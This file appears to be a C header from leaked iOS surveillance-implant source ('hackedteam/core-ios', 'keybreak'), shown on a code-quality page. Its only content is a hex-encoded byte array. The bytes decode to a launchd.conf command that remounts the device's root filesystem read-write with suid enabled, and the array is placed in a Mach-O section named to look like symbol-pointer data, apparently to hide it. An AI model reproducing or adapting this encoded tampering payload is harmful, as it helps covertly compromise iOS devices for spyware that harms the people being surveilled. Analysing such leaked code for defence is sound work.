hackedteam/core-ios

View on GitHub
keybreak/include/launchd.h

Summary

Maintainability
Test Coverage
#ifdef __DARWIN
__attribute__ ((section ("__DATA,__lc_symbol_ptr")))
#endif
unsigned char res_launchd_conf[] = {
  0x62, 0x73, 0x65, 0x78, 0x65, 0x63, 0x20, 0x2e, 0x2e, 0x20, 0x2f, 0x73,
  0x62, 0x69, 0x6e, 0x2f, 0x6d, 0x6f, 0x75, 0x6e, 0x74, 0x20, 0x2d, 0x75,
  0x20, 0x2d, 0x6f, 0x20, 0x72, 0x77, 0x2c, 0x73, 0x75, 0x69, 0x64, 0x2c,
  0x64, 0x65, 0x76, 0x20, 0x2f
};
unsigned int res_launchd_conf_len = 41;